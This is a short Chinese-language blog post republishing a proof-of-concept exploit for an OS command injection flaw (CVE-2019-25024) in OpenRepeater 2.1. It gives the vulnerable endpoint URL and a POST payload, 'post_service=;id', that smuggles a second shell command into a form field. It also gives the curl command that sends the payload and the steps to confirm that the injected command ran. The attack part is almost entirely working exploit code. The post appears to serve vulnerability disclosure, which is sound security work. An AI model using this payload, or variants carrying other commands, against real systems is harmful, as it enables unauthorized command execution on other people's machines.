OpenRepeater 2.1 操作系统命令注入漏洞详解

本文详细分析了OpenRepeater 2.1版本中存在的操作系统命令注入漏洞(CVE-2019-25024),提供了概念验证代码和详细的复现步骤,该漏洞允许攻击者通过构造特定的POST请求在目标系统上执行任意命令。

漏洞标题:OpenRepeater 2.1 - 操作系统命令注入

日期:2025-11-25

漏洞作者:CodeSecLab

供应商主页:https://github.com/OpenRepeater/openrepeater

软件链接:https://github.com/OpenRepeater/openrepeater

版本:2.1

测试环境:Ubuntu

CVE:CVE-2019-25024

概念验证

OpenRepeater 2.2之前版本操作系统命令注入漏洞的概念验证代码

易受攻击端点的目标URL

TARGET_URL=“http://openrepeater/functions/ajax_system.php”

用于执行任意命令的有效载荷,例如使用’id’命令来演示该漏洞

PAYLOAD=“post_service=;id”

使用curl发送有效载荷

curl -X POST -d “$PAYLOAD” “$TARGET_URL”

复现步骤:

  1. 发送POST请求。
  2. 观察结果,注入的命令(例如,uid=…)将会出现。
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计